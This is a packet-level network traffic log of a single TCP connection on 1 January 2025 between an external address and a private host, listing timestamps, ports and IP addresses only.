Jan 1, 2025 12:32:13.933408022 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.933449030 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.933468103 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.933494091 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.933502913 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.933511019 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.933518887 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.933551073 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.933576107 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.933598042 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.933609962 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.933624029 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.933633089 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.933646917 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.933654070 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.933671951 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.933691978 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.933700085 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.933712006 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.933747053 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.933749914 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.933757067 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.933792114 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.933799982 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.933805943 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.933846951 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.933860064 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.933867931 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.933876038 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.933902979 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.933911085 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.933954000 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.933979988 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.933993101 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.934000015 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934009075 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934026003 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934042931 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934056044 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934061050 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.934092045 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934101105 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934123039 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.934153080 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.934155941 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934165001 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934189081 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934204102 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934207916 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.934245110 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934247971 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.934253931 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934309006 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.934354067 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934370041 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934392929 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934400082 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934413910 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934421062 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934432030 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.934456110 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934464931 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934495926 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.934501886 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934509993 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934550047 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934556961 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.934559107 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934588909 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934597015 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934616089 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.934617996 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934628010 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934663057 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.934665918 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934674978 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934678078 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.934706926 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.934711933 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934720039 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934726000 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.934756041 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.934760094 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934767962 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934798956 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934806108 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.934808016 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934835911 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934844017 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934849977 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.934873104 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.934883118 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934890985 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934900999 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.934930086 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.934982061 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934989929 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.934999943 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935014963 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935035944 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935043097 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935046911 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.935048103 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935064077 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.935065985 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935108900 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935117006 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935122967 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.935152054 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.935161114 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935168982 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935210943 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.935213089 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935220957 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935229063 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935235977 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935265064 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935272932 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935303926 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.935307026 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935333014 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.935334921 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935344934 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935350895 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.935353041 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935380936 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.935383081 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935401917 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935401917 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.935414076 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935421944 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935425043 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.935446024 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.935453892 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935465097 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.935471058 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935486078 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935493946 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935498953 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.935528040 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.935529947 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935538054 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935550928 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.935580015 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.935596943 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935609102 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935631990 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935640097 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935648918 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.935658932 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935667992 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935676098 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935691118 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.935693979 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935704947 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.935709000 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935717106 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935743093 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.935751915 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935760021 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935762882 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.935786009 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.935786963 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935795069 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935801983 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.935806990 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.935826063 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.935848951 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.938097000 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938160896 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938194990 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938211918 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.938242912 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938251019 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938266993 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.938272953 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938282013 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938318014 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938325882 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938325882 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.938344002 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.938359976 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938368082 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938383102 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.938410044 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938410044 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.938419104 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938457012 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938467979 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938483953 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.938498974 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.938500881 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938539028 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938549995 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.938591003 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938600063 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938610077 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.938627958 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.938640118 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938648939 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938656092 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.938688040 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.938708067 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938716888 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938750982 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938755035 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.938759089 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938793898 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938803911 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.938812017 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938844919 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.938859940 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.938880920 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938889980 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938937902 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938941002 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.938946962 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.938982964 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.938992023 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939001083 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939042091 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939043045 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.939049959 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939075947 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939084053 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939095020 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.939131975 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.939148903 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939165115 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939181089 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939196110 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939213037 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.939214945 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939244032 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.939261913 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.939356089 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939372063 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939379930 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939389944 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939400911 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.939404011 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939413071 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939420938 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939435005 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939443111 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939460039 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939461946 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.939467907 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939482927 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939486027 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.939491034 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939512968 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.939523935 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.939529896 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939538956 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939543009 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.939557076 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939564943 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939574003 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939579010 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.939582109 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939599991 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.939627886 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.939640045 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939645052 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.939665079 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939681053 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939692020 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.939697027 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939704895 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.939706087 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939723015 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939728975 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.939742088 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.939758062 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.939795971 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939816952 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939834118 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939841986 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.939856052 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939857960 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.939886093 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.939898014 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.939904928 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939913988 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939935923 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939944029 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.939969063 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.939985991 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.939990044 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940005064 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940020084 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940030098 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940047979 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.940048933 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940066099 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940083981 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.940099001 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.940148115 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940155983 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940165997 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940179110 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940191984 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940196991 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.940205097 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940211058 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.940246105 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.940253973 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940262079 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940268993 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.940285921 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940294981 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940304041 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.940330982 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.940335035 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940366030 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940387964 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940392017 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.940397024 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940412045 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940418959 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940422058 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.940443993 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.940449953 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940459013 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940469980 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.940474033 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940481901 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940512896 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.940557957 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940572977 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940583944 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.940592051 CET	55615	49738	185.222.57.76	192.168.2.4
